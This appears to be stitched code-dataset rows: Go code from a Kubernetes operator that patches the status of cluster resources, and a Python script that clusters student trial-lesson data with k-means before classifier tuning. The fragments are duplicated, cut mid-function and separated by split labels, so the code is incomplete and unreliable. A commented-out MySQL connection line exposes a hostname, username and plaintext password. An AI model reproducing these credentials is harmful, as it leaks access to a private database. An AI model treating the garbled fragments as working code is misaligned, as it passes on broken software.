r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdating))
}
}
// Set the status cluster condition to updated when an update successfully
// took place. Precondition for this is the tenant cluster is updating and all
// nodes being known and all nodes having the same versions.
{
isUpdating := clusterStatus.HasUpdatingCondition()
notUpdated := !clusterStatus.HasUpdatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isUpdating && notUpdated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdated))
}
}
// Check all node versions held by the cluster status and add the version the
// tenant cluster successfully migrated to, to the historical list of versions.
{
hasTransitioned := clusterStatus.HasCreatedCondition() || clusterStatus.HasUpdatedCondition()
notSet := !clusterStatus.HasVersion(desiredVersion)
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if hasTransitioned && notSet && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/versions",
Value: clusterStatus.WithNewVersion(desiredVersion),
})
r.logger.LogCtx(ctx, "level", "info", "message", "setting status versions")
} | }
// Update the node status based on what the tenant cluster API tells us.
//
// TODO this is a workaround until we can read the node status information
// from the NodeConfig CR status. This is not possible right now because the
// NodeConfig CRs are still used for draining by older tenant clusters.
{
var k8sClient kubernetes.Interface
{
r.logger.LogCtx(ctx, "level", "debug", "message", "creating Kubernetes client for tenant cluster")
i, err := r.clusterIDFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
e, err := r.clusterEndpointFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
restConfig, err := r.tenantCluster.NewRestConfig(ctx, i, e)
if tenantcluster.IsTimeout(err) {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not create Kubernetes client for tenant cluster")
r.logger.LogCtx(ctx, "level", "debug", "message", "waiting for certificates timed out")
} else if err != nil {
return nil, microerror.Mask(err)
}
clientsConfig := k8sclient.ClientsConfig{
Logger: r.logger,
RestConfig: restConfig,
}
k8sClients, err := k8sclient.NewClients(clientsConfig)
if tenant.IsAPINotAvailable(err) || k8sclient.IsTimeout(err) {
r.logger.Debugf(ctx, "did not create Kubernetes client for tenant cluster, api is not yet available, canceling resource")
return nil, nil
} else if err != nil {
return nil, microerror.Mask(err)
}
k8sClient = k8sClients.K8sClient()
}
r.logger.LogCtx(ctx, "level", "debug", "message", "created Kubernetes client for tenant cluster")
o := metav1.ListOptions{}
list, err := k8sClient.CoreV1().Nodes().List(ctx, o)
if err != nil {
return nil, microerror.Mask(err)
}
var nodes []providerv1alpha1.StatusClusterNode
for _, node := range list.Items {
l := node.GetLabels()
n := node.GetName()
labelProvider := "giantswarm.io/provider"
p, ok := l[labelProvider]
if !ok {
return nil, microerror.Maskf(missingLabelError, labelProvider)
}
labelVersion := p + "-operator.giantswarm.io/version"
v, ok := l[labelVersion]
if !ok {
return nil, microerror.Maskf(missingLabelError, labelVersion)
}
nodes = append(nodes, providerv1alpha1.NewStatusClusterNode(n, v, l))
}
nodesDiffer := nodes != nil && !allNodesEqual(clusterStatus.Nodes, nodes)
if nodesDiffer {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/nodes",
Value: nodes,
})
r.logger.LogCtx(ctx, "level", "info", "message", "setting status nodes")
}
}
// TODO emit metrics when update did not complete within a certain timeframe
return patches, nil
}
func allNodesHaveVersion(nodes []providerv1alpha1.StatusClusterNode, version string) bool {
if len(nodes) == 0 {
return false
}
for _, n := range nodes {
if n.Version != version {
return false
}
}
return true
}
func allNodesEqual(aNodes []providerv1alpha1.StatusClusterNode, bNodes []providerv1alpha1.StatusClusterNode) bool {
aRemoved := removeTimesFromNodes(aNodes)
bRemoved := removeTimesFromNodes(bNodes)
return reflect.DeepEqual(aRemoved, bRemoved)
}
func removeTimesFromNodes(nodes []providerv1alpha1.StatusClusterNode) []providerv1alpha1.StatusClusterNode {
var newNodes []providerv1alpha1.StatusClusterNode
for _, n := range nodes {
n.LastTransitionTime = metav1.Time{}
newNodes = append(newNodes, n)
}
return newNodes
} | random_line_split |
|
create.go | package statusresource
import (
"context"
"fmt"
"reflect"
"time"
providerv1alpha1 "github.com/giantswarm/apiextensions/v6/pkg/apis/provider/v1alpha1"
"github.com/giantswarm/backoff"
"github.com/giantswarm/errors/tenant"
"github.com/giantswarm/k8sclient/v7/pkg/k8sclient"
"github.com/giantswarm/microerror"
"github.com/giantswarm/operatorkit/v7/pkg/controller/context/reconciliationcanceledcontext"
"github.com/giantswarm/tenantcluster/v4/pkg/tenantcluster"
"k8s.io/apimachinery/pkg/api/meta"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/client-go/kubernetes"
)
func (r *Resource) | (ctx context.Context, obj interface{}) error {
r.logger.LogCtx(ctx, "level", "debug", "message", "patching CR status")
// We process the status updates within its own backoff here to guarantee its
// execution independent of any eventual retries via the retry resource. It
// might happen that the reconciled object is not the latest version so any
// patch would fail. In case the patch fails we retry until we succeed. The
// steps of the backoff operation are as follows.
//
// Fetch latest version of runtime object.
// Compute patches for runtime object.
// Apply computed list of patches.
//
// In case there are no patches we do not need to do anything. So we prevent
// unnecessary API calls.
var modified bool
{
o := func() error {
accessor, err := meta.Accessor(obj)
if err != nil {
return microerror.Mask(err)
}
newObj, err := r.restClient.Get().AbsPath(accessor.GetSelfLink()).Do(ctx).Get()
if err != nil {
return microerror.Mask(err)
}
newAccessor, err := meta.Accessor(newObj)
if err != nil {
return microerror.Mask(err)
}
patches, err := r.computeCreateEventPatches(ctx, newObj)
if tenant.IsAPINotAvailable(err) {
r.logger.LogCtx(ctx, "level", "debug", "message", "tenant cluster is not available")
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling resource")
return nil
} else if err != nil {
return microerror.Mask(err)
}
if len(patches) > 0 {
err := r.applyPatches(ctx, newAccessor, patches)
if err != nil {
return microerror.Mask(err)
}
modified = true
}
return nil
}
b := r.backOffFactory()
n := func(err error, d time.Duration) {
r.logger.LogCtx(ctx, "level", "warning", "message", "retrying status patching due to error", "stack", fmt.Sprintf("%#v", err))
}
err := backoff.RetryNotify(o, b, n)
if err != nil {
return microerror.Mask(err)
}
}
if modified {
r.logger.LogCtx(ctx, "level", "debug", "message", "patched CR status")
reconciliationcanceledcontext.SetCanceled(ctx)
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling reconciliation")
} else {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not patch CR status")
}
return nil
}
func (r *Resource) computeCreateEventPatches(ctx context.Context, obj interface{}) ([]Patch, error) {
clusterStatus, err := r.clusterStatusFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentVersion := clusterStatus.LatestVersion()
desiredVersion, err := r.versionBundleVersionFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentNodeCount := len(clusterStatus.Nodes)
desiredNodeCount, err := r.nodeCountFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
var patches []Patch
// In case a CR might not have a status at all, we cannot work with it below.
// We have to initialize it upfront to be safe. Note that we only initialize
// fields that are managed by the statusresource library implementation. There
// might be other properties managed by external authorities who have to
// manage their own initialization.
patches = ensureDefaultPatches(clusterStatus, patches)
// After initialization the most likely implication is the tenant cluster being
// in a creation status. In case no other conditions are given and no nodes
// are known and no versions are set, we set the tenant cluster status to a
// creating condition.
{
notCreating := !clusterStatus.HasCreatingCondition()
conditionsEmpty := len(clusterStatus.Conditions) == 0
nodesEmpty := len(clusterStatus.Nodes) == 0
versionsEmpty := len(clusterStatus.Versions) == 0
if notCreating && conditionsEmpty && nodesEmpty && versionsEmpty {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreating))
}
}
// Once the tenant cluster is created we set the according status condition so
// the cluster status reflects the transitioning from creating to created.
{
isCreating := clusterStatus.HasCreatingCondition()
notCreated := !clusterStatus.HasCreatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isCreating && notCreated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreated))
}
}
// When we notice the current and the desired tenant cluster version differs,
// an update is about to be processed. So we set the status condition
// indicating the tenant cluster is updating now.
{
isCreated := clusterStatus.HasCreatedCondition()
notUpdating := !clusterStatus.HasUpdatingCondition()
versionDiffers := currentVersion != "" && currentVersion != desiredVersion
if isCreated && notUpdating && versionDiffers {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdating))
}
}
// Set the status cluster condition to updated when an update successfully
// took place. Precondition for this is the tenant cluster is updating and all
// nodes being known and all nodes having the same versions.
{
isUpdating := clusterStatus.HasUpdatingCondition()
notUpdated := !clusterStatus.HasUpdatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isUpdating && notUpdated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdated))
}
}
// Check all node versions held by the cluster status and add the version the
// tenant cluster successfully migrated to, to the historical list of versions.
{
hasTransitioned := clusterStatus.HasCreatedCondition() || clusterStatus.HasUpdatedCondition()
notSet := !clusterStatus.HasVersion(desiredVersion)
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if hasTransitioned && notSet && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/versions",
Value: clusterStatus.WithNewVersion(desiredVersion),
})
r.logger.LogCtx(ctx, "level", "info", "message", "setting status versions")
}
}
// Update the node status based on what the tenant cluster API tells us.
//
// TODO this is a workaround until we can read the node status information
// from the NodeConfig CR status. This is not possible right now because the
// NodeConfig CRs are still used for draining by older tenant clusters.
{
var k8sClient kubernetes.Interface
{
r.logger.LogCtx(ctx, "level", "debug", "message", "creating Kubernetes client for tenant cluster")
i, err := r.clusterIDFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
e, err := r.clusterEndpointFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
restConfig, err := r.tenantCluster.NewRestConfig(ctx, i, e)
if tenantcluster.IsTimeout(err) {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not create Kubernetes client for tenant cluster")
r.logger.LogCtx(ctx, "level", "debug", "message", "waiting for certificates timed out")
} else if err != nil {
return nil, microerror.Mask(err)
}
clientsConfig := k8sclient.ClientsConfig{
Logger: r.logger,
RestConfig: restConfig,
}
k8sClients, err := k8sclient.NewClients(clientsConfig)
if tenant.IsAPINotAvailable(err) || k8sclient.IsTimeout(err) {
r.logger.Debugf(ctx, "did not create Kubernetes client for tenant cluster, api is not yet available, canceling resource")
return nil, nil
} else if err != nil {
return nil, microerror.Mask(err)
}
k8sClient = k8sClients.K8sClient()
}
r.logger.LogCtx(ctx, "level", "debug", "message", "created Kubernetes client for tenant cluster")
o := metav1.ListOptions{}
list, err := k8sClient.CoreV1().Nodes().List(ctx, o)
if err != nil {
return nil, microerror.Mask(err)
}
var nodes []providerv1alpha1.StatusClusterNode
for _, node := range list.Items {
l := node.GetLabels()
n := node.GetName()
labelProvider := "giantswarm.io/provider"
p, ok := l[labelProvider]
if !ok {
return nil, microerror.Maskf(missingLabelError, labelProvider)
}
labelVersion := p + "-operator.giantswarm.io/version"
v, ok := l[labelVersion]
if !ok {
return nil, microerror.Maskf(missingLabelError, labelVersion)
}
nodes = append(nodes, providerv1alpha1.NewStatusClusterNode(n, v, l))
}
nodesDiffer := nodes != nil && !allNodesEqual(clusterStatus.Nodes, nodes)
if nodesDiffer {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/nodes",
Value: nodes,
})
r.logger.LogCtx(ctx, "level", "info", "message", "setting status nodes")
}
}
// TODO emit metrics when update did not complete within a certain timeframe
return patches, nil
}
func allNodesHaveVersion(nodes []providerv1alpha1.StatusClusterNode, version string) bool {
if len(nodes) == 0 {
return false
}
for _, n := range nodes {
if n.Version != version {
return false
}
}
return true
}
func allNodesEqual(aNodes []providerv1alpha1.StatusClusterNode, bNodes []providerv1alpha1.StatusClusterNode) bool {
aRemoved := removeTimesFromNodes(aNodes)
bRemoved := removeTimesFromNodes(bNodes)
return reflect.DeepEqual(aRemoved, bRemoved)
}
func removeTimesFromNodes(nodes []providerv1alpha1.StatusClusterNode) []providerv1alpha1.StatusClusterNode {
var newNodes []providerv1alpha1.StatusClusterNode
for _, n := range nodes {
n.LastTransitionTime = metav1.Time{}
newNodes = append(newNodes, n)
}
return newNodes
}
| EnsureCreated | identifier_name |
kmeans_to_classifier_main.py | from data_treatment import load_data_yf,data_clean,seperate_label,data_seperate,load_data_new,data_transform_new,plot_eda,data_clean,feature_extend
from models import rf_mdoel,gbdt_mdoel,xgb_model,cat_boost_model,lgb_model,get_stacking
from sklearn.metrics import make_scorer
from sklearn.ensemble import RandomForestClassifier,GradientBoostingClassifier
from model_evalu import evalution_model,plot_importance
import numpy as npr
from xgboost import XGBClassifier
from sklearn.metrics import precision_score,f1_score,recall_score
import warnings
import pandas as pd
import numpy as np
import pymysql
from catboost import CatBoostClassifier,CatBoostRegressor,Pool
if __name__ == '__main__':
warnings.filterwarnings('ignore')
# Load the data
sql = "select * from bidata.trail_boost"
df = load_data_new(sql, filename="df_201810166.csv")
# Load additional data (commented out below)
# sql_new = "select DISTINCT teacher_id,history_trail_cnt,history_trail_suc_cnt_bycontract,history_trail_suc_cnt_bystudent,first_tkod_tifl_count from trail_boost"
# conn = pymysql.connect(host="rm-2ze974348wa9e1ev3uo.mysql.rds.aliyuncs.com", port=3306, user="yanfei_read",
# passwd="xMbquuHi98JyfiF1", db="bidata", charset="utf8")
# df_new = pd.read_sql(sql_new, conn)
# conn.close()
#
# df = pd.merge(df,df_new,how="left",on=["teacher_id"])
label_by_contract = "is_sucess_by_contract"
label_by_pay = "is_sucess_by_pay"
label_by_official_course = "is_sucess_by_official_course"
labels = label_by_contract
select_columns = [
# 'student_no',
'is_first_trail',
# 'grade_rank',
# 'teacher_id',
# 'student_province',
'student_province_byphone',
'class_rank_fillna',
'grade_subject',
'student_grade',
'student_city_class_detail',
'know_origin_discretize',
# 'coil_in_discretize',
# #
'subject_ids',
'school_background',
'student_sex_fillna',
'teacher_sex',
# "lesson_asigned_way",
'coil_in',
'know_origin',
"is_login",
#
'history_rate_bystudent',
'history_trail_suc_cnt_bycontract',
'history_trail_suc_cnt_bystudent',
'l3m_sucess_rate',
'trial_course_rate',
'l3m_student_relative',
'score_mean',
'daily_trail_count',
'teacher_requirements_times',
'sucess_rate',
'l3m_trail_not_best_rate',
'l3m_teacher_trail_not_best_cnt',
'month',
'l3m_trial_course_rate',
'l3m_hw_submit_rate',
'taught_trial_course_count',
'first_tkod_tifl_count',
'history_trail_cnt',
'teacher_after_4d_lp_cnt',
'l3m_hw_correct_rate',
# #
'teacher_fresh_hour',
"effectiveCommunicationCount",
"score_min",
'learning_target_lenght',
"teacher_staff_age_byopt",
'self_evaluation_length',
'l3m_avg_has_qz_lc',
'l3m_avg_prop_has_qz_lc',
'l3m_has_qz_lc',
'l3m_prop_has_qz_lc',
labels
]
print(len(df))
# Data preprocessing
df_train, df_btest= data_clean(df, min_date="2018-01-01", mid_date="2018-06-15", max_date="2018-06-30",label=labels)
df_train = df_train[select_columns]
df_btest = df_btest[select_columns]
print(len(df_btest))
print(df_train.columns)
print('正/负', str(len(df_train[df_train[labels] == 1])) + '/' + str(len(df_train[df_train[labels] == 0])))
t = len(df_train[df_train[labels] == 0]) / len(df_train[df_train[labels] == 1])
v = len(df_btest[df_btest[labels] == 0]) / len(df_btest[df_btest[labels] == 1])
print(t,v)
# Feature selection (RFECV, commented out below)
# from sklearn.feature_selection import RFECV
#
# dt_score = make_scorer(precision_score, pos_label=1)
# rf = RandomForestClassifier(n_estimators=24, criterion='gini', max_depth=7,
# random_state=5, class_weight={1: t},
# n_jobs=-1)
# selector = RFECV(rf, step=1, cv=5, scoring=dt_score, n_jobs=-1)
# selector = selector.fit(df_train.drop([labels], axis=1), df_train[labels])
#
# print("查看哪些特征是被选择的", selector.support_) # 查看哪些特征是被选择的
# print("被筛选的特征数量", selector.n_features_)
# print("特征排名", selector.ranking_)
# columns = pd.DataFrame(df_train.drop([labels], axis=1).columns).rename(columns={0: "features"})
# sl = pd.DataFrame(selector.support_).rename(columns={0: "result_rfecv"})
# sk = pd.concat([columns, sl], axis=1)
# sk_select = sk[sk['result_rfecv'] == True]
# sm = list(sk_select["features"])
# sm.append(labels)
#
# df_train = df_train[sm]
# df_btest = df_btest[sm]
# print(len(df_btest))
# Split into training and test sets
X_train_tra, X_test_tra, df_btest= data_seperate(df_train,df_btest, size=0.3, cri=None,undeal_column=[
# 'is_first_trail',
# 'grade_rank',
# 'teacher_id',
# 'student_province',
'student_province_byphone',
# 'class_rank_fillna',
'grade_subject',
'student_grade',
'student_city_class_detail',
'know_origin_discretize',
# 'coil_in_discretize',
# #
# 'subject_ids',
# 'school_background',
# 'student_sex_fillna',
# 'teacher_sex',
'coil_in',
'know_origin',
# "is_login",
# "lesson_asigned_way",
labels])
# Split off the label
# x_train, y_train = seperate_label(X_train_tra, label=labels)
# x_test, y_test = seperate_label(X_test_tra, label=labels)
x_train = X_train_tra.copy()
x_test = X_test_tra.copy()
# sample_weight
y_train = x_train[labels]
from collections import Counter
cout = Counter(y_train)
tt = cout[0] / cout[1]
sample_weigh = np.where(y_train == 0, 1, tt)
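# Hedged illustration (numbers are made up): if Counter(y_train) were {0: 300, 1: 100},
# then tt == 3.0 and sample_weigh assigns weight 1 to every negative sample and 3.0 to
# every positive sample, compensating for the class imbalance.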
# Split samples into clusters with k-means
from sklearn.cluster import KMeans
estimator = KMeans(n_clusters=5, random_state=0) # 构造聚类器
estimator.fit(x_train.drop(labels, axis=1)) # 聚类
train_label = estimator.predict(x_train.drop(labels, axis=1))
test_label = estimator.predict(x_test.drop(labels, axis=1))
btest_label = estimator.predict(df_btest.drop("is_sucess_by_contract", axis=1))
x_train["chunk_label"] = train_label
x_test["chunk_label"] = test_label
df_btest["chunk_label"] = btest_label
# df_btest["count"] = 1
# ss = pd.pivot_table(df_btest, index=["is_sucess_by_contract"], columns=["chunk_label"], values=["count"], aggfunc=np.sum)
#rf0
# clf = RandomForestClassifier(n_estimators=21, max_depth=5, max_features=9, random_state=5, n_jobs=-1,criterion="gini")
# clf = GradientBoostingClassifier(loss="deviance", learning_rate=0.1,
# n_estimators=20, subsample=1.0,max_features=8,
# criterion="mse",warm_start=True,
# min_samples_split=2, min_samples_leaf=1,
# max_depth=5, random_state=5)
# clf = XGBClassifier(
# max_depth=6,
# min_child_weight=1,
# learning_rate=0.1,
# n_estimators=20,
# silent=True,
# objective='binary:logistic',
# gamma=0,
# max_delta_step=0,
# subsample=1,
# colsample_bytree=1,
# colsample_bylevel=1,
# reg_alpha=0,
# reg_lambda=0,
# # scale_pos_weight=3.687,
# seed=1,
# missing=None,
# random_state=5)
# clf= CatBoostClassifier(learning_rate=0.01, depth=9, l2_leaf_reg=0.1, loss_function='CrossEntropy',
# # class_weights=[1, 2.8],
# thread_count=24, random_state=5)
from tpot import TPOTClassifier
tpot_config = {
'sklearn.ensemble.RandomForestClassifier':
{
'criterion': ['gini'],
'n_estimators': range(20, 25),
'max_depth': range(5, 10),
'max_features': range(5, 10),
'class_weight': [{1: i} for i in np.linspace(tt - 1, tt + 1, 3)]
},
'sklearn.ensemble.GradientBoostingClassifier': {
"loss": ["deviance"], # GBDT parameters
"learning_rate": [0.01, 0.1],
"n_estimators": range(20, 25),
"subsample": [0.5, 0.8, 1.0],
"criterion": ["friedman_mse", "mse"],
"max_features": range(5, 10), # DT parameters
"max_depth": range(5, 10),
"warm_start": [True]},
'xgboost.XGBClassifier': {
"learning_rate": [0.1, 0.01],
"n_estimators": range(20, 25),
"scale_pos_weight": [i for i in np.linspace(tt - 1, tt + 1, 3)],
# similar in effect to class_weight
"subsample": [0.85], # fraction of samples per boosting round, guards against overfitting
"min_child_weight": range(6, 7),
"max_depth": range(3, 8),
},
'catboost.CatBoostClassifier':
{
"learning_rate": [0.01],
"loss_function": ['CrossEntropy', 'Logloss'], # 取多少样本,放过拟合
"depth": range(9, 10),
"class_weights": [[1, i] for i in
np.linspace(tt - 1, tt + 1, 3)]},
'lightgbm.LGBMModel': {
'categorical_feature': ['auto'],
# 'weight': sample_weigh,
'boosting_type': ['gbdt', 'dart', 'rf'],
'n_estimators': range(20, 25),
'learning_rate': [0.1, 0.01],
'subsample_freq': [0.5, 0.8, 1],
'colsample_bytree': [0.5, 0.8, 1],
'num_leaves': range(28, 33),
}
}
|
for i in range(5):
tpo = TPOTClassifier(generations=10, verbosity=2, population_size=150,
scoring='f1', n_jobs=-1, config_dict=tpot_config,
mutation_rate=0.8, crossover_rate=0.2)
x_train_x = np.array(x_train[x_train["chunk_label"] == i].drop(["chunk_label", labels],
axis=1))
x_test_x = np.array(x_test[x_test["chunk_label"] == i].drop(["chunk_label", labels],
axis=1))
df_btest_x = df_btest[df_btest["chunk_label"] == i].drop("chunk_label",
axis=1)
y_train_x = np.array(x_train[labels])
# clf = tpo.fit(x_train_x, y_train_x)
#
# print(len(df_btest_x))
# print("=========modelu", i, "============")
# evalution_model(clf, df_btest_x.drop("is_sucess_by_contract", axis=1),
# df_btest_x["is_sucess_by_contract"])
#
#
# evalution_model(clf, df_btest.drop("is_sucess_by_contract", axis=1), df_btest["is_sucess_by_contract"])
#
#
# # | random_line_split |
|
kmeans_to_classifier_main.py | from data_treatment import load_data_yf,data_clean,seperate_label,data_seperate,load_data_new,data_transform_new,plot_eda,data_clean,feature_extend
from models import rf_mdoel,gbdt_mdoel,xgb_model,cat_boost_model,lgb_model,get_stacking
from sklearn.metrics import make_scorer
from sklearn.ensemble import RandomForestClassifier,GradientBoostingClassifier
from model_evalu import evalution_model,plot_importance
import numpy as npr
from xgboost import XGBClassifier
from sklearn.metrics import precision_score,f1_score,recall_score
import warnings
import pandas as pd
import numpy as np
import pymysql
from catboost import CatBoostClassifier,CatBoostRegressor,Pool
if __name__ == '__main__':
warnings.filterwarnings('ignore')
# Load data
sql = "select * from bidata.trail_boost"
df = load_data_new(sql, filename="df_201810166.csv")
# Load new data
# sql_new = "select DISTINCT teacher_id,history_trail_cnt,history_trail_suc_cnt_bycontract,history_trail_suc_cnt_bystudent,first_tkod_tifl_count from trail_boost"
# conn = pymysql.connect(host="rm-2ze974348wa9e1ev3uo.mysql.rds.aliyuncs.com", port=3306, user="yanfei_read",
# passwd="xMbquuHi98JyfiF1", db="bidata", charset="utf8")
# df_new = pd.read_sql(sql_new, conn)
# conn.close()
#
# df = pd.merge(df,df_new,how="left",on=["teacher_id"])
label_by_contract = "is_sucess_by_contract"
label_by_pay = "is_sucess_by_pay"
label_by_official_course = "is_sucess_by_official_course"
labels = label_by_contract
select_columns = [
# 'student_no',
'is_first_trail',
# 'grade_rank',
# 'teacher_id',
# 'student_province',
'student_province_byphone',
'class_rank_fillna',
'grade_subject',
'student_grade',
'student_city_class_detail',
'know_origin_discretize',
# 'coil_in_discretize',
# #
'subject_ids',
'school_background',
'student_sex_fillna',
'teacher_sex',
# "lesson_asigned_way",
'coil_in',
'know_origin',
"is_login",
#
'history_rate_bystudent',
'history_trail_suc_cnt_bycontract',
'history_trail_suc_cnt_bystudent',
'l3m_sucess_rate',
'trial_course_rate',
'l3m_student_relative',
'score_mean',
'daily_trail_count',
'teacher_requirements_times',
'sucess_rate',
'l3m_trail_not_best_rate',
'l3m_teacher_trail_not_best_cnt',
'month',
'l3m_trial_course_rate',
'l3m_hw_submit_rate',
'taught_trial_course_count',
'first_tkod_tifl_count',
'history_trail_cnt',
'teacher_after_4d_lp_cnt',
'l3m_hw_correct_rate',
# #
'teacher_fresh_hour',
"effectiveCommunicationCount",
"score_min",
'learning_target_lenght',
"teacher_staff_age_byopt",
'self_evaluation_length',
'l3m_avg_has_qz_lc',
'l3m_avg_prop_has_qz_lc',
'l3m_has_qz_lc',
'l3m_prop_has_qz_lc',
labels
]
print(len(df))
# Data preprocessing
df_train, df_btest= data_clean(df, min_date="2018-01-01", mid_date="2018-06-15", max_date="2018-06-30",label=labels)
df_train = df_train[select_columns]
df_btest = df_btest[select_columns]
print(len(df_btest))
print(df_train.columns)
print('pos/neg', str(len(df_train[df_train[labels] == 1])) + '/' + str(len(df_train[df_train[labels] == 0])))
t = len(df_train[df_train[labels] == 0]) / len(df_train[df_train[labels] == 1])
v = len(df_btest[df_btest[labels] == 0]) / len(df_btest[df_btest[labels] == 1])
print(t,v)
# Feature selection
# from sklearn.feature_selection import RFECV
#
# dt_score = make_scorer(precision_score, pos_label=1)
# rf = RandomForestClassifier(n_estimators=24, criterion='gini', max_depth=7,
# random_state=5, class_weight={1: t},
# n_jobs=-1)
# selector = RFECV(rf, step=1, cv=5, scoring=dt_score, n_jobs=-1)
# selector = selector.fit(df_train.drop([labels], axis=1), df_train[labels])
#
# print("查看哪些特征是被选择的", selector.support_) # 查看哪些特征是被选择的
# print("被筛选的特征数量", selector.n_features_)
# print("特征排名", selector.ranking_)
# columns = pd.DataFrame(df_train.drop([labels], axis=1).columns).rename(columns={0: "features"})
# sl = pd.DataFrame(selector.support_).rename(columns={0: "result_rfecv"})
# sk = pd.concat([columns, sl], axis=1)
# sk_select = sk[sk['result_rfecv'] == True]
# sm = list(sk_select["features"])
# sm.append(labels)
#
# df_train = df_train[sm]
# df_btest = df_btest[sm]
# print(len(df_btest))
# Split into training and test sets
X_train_tra, X_test_tra, df_btest= data_seperate(df_train,df_btest, size=0.3, cri=None,undeal_column=[
# 'is_first_trail',
# 'grade_rank',
# 'teacher_id',
# 'student_province',
'student_province_byphone',
# 'class_rank_fillna',
'grade_subject',
'student_grade',
'student_city_class_detail',
'know_origin_discretize',
# 'coil_in_discretize',
# #
# 'subject_ids',
# 'school_background',
# 'student_sex_fillna',
# 'teacher_sex',
'coil_in',
'know_origin',
# "is_login",
# "lesson_asigned_way",
labels])
# Split off the label column
# x_train, y_train = seperate_label(X_train_tra, label=labels)
# x_test, y_test = seperate_label(X_test_tra, label=labels)
x_train = X_train_tra.copy()
x_test = X_test_tra.copy()
# sample_weight
y_train = x_train[labels]
from collections import Counter
cout = Counter(y_train)
tt = cout[0] / cout[1]
sample_weigh = np.where(y_train == 0, 1, tt)
# k-means: partition samples into clusters
from sklearn.cluster import KMeans
estimator = KMeans(n_clusters=5, random_state=0) # build the clusterer
estimator.fit(x_train.drop(labels, axis=1)) # cluster the training data
train_label = estimator.predict(x_train.drop(labels, axis=1))
test_label = estimator.predict(x_test.drop(labels, axis=1))
btest_label = estimator.predict(df_btest.drop("is_sucess_by_contract", axis=1))
x_train["chunk_label"] = train_label
x_test["chunk_label"] = test_label
df_btest["chunk_label"] = btest_label
# df_btest["count"] = 1
# ss = pd.pivot_table(df_btest, index=["is_sucess_by_contract"], columns=["chunk_label"], values=["count"], aggfunc=np.sum)
#rf0
# clf = RandomForestClassifier(n_estimators=21, max_depth=5, max_features=9, random_state=5, n_jobs=-1,criterion="gini")
# clf = GradientBoostingClassifier(loss="deviance", learning_rate=0.1,
# n_estimators=20, subsample=1.0,max_features=8,
# criterion="mse",warm_start=True,
# min_samples_split=2, min_samples_leaf=1,
# max_depth=5, random_state=5)
# clf = XGBClassifier(
# max_depth=6,
# min_child_weight=1,
# learning_rate=0.1,
# n_estimators=20,
# silent=True,
# objective='binary:logistic',
# gamma=0,
# max_delta_step=0,
# subsample=1,
# colsample_bytree=1,
# colsample_bylevel=1,
# reg_alpha=0,
# reg_lambda=0,
# # scale_pos_weight=3.687,
# seed=1,
# missing=None,
# random_state=5)
# clf= CatBoostClassifier(learning_rate=0.01, depth=9, l2_leaf_reg=0.1, loss_function='CrossEntropy',
# # class_weights=[1, 2.8],
# thread_count=24, random_state=5)
from tpot import TPOTClassifier
tpot_config = {
'sklearn.ensemble.RandomForestClassifier':
{
'criterion': ['gini'],
'n_estimators': range(20, 25),
'max_depth': range(5, 10),
'max_features': range(5, 10),
'class_weight': [{1: i} for i in np.linspace(tt - 1, tt + 1, 3)]
},
'sklearn.ensemble.GradientBoostingClassifier': {
"loss": ["deviance"], # GBDT parameters
"learning_rate": [0.01, 0.1],
"n_estimators": range(20, 25),
"subsample": [0.5, 0.8, 1.0],
"criterion": ["friedman_mse", "mse"],
"max_features": range(5, 10), # DT parameters
"max_depth": range(5, 10),
"warm_start": [True]},
'xgboost.XGBClassifier': {
"learning_rate": [0.1, 0.01],
"n_estimators": range(20, 25),
"scale_pos_weight": [i for i in np.linspace(tt - 1, tt + 1, 3)],
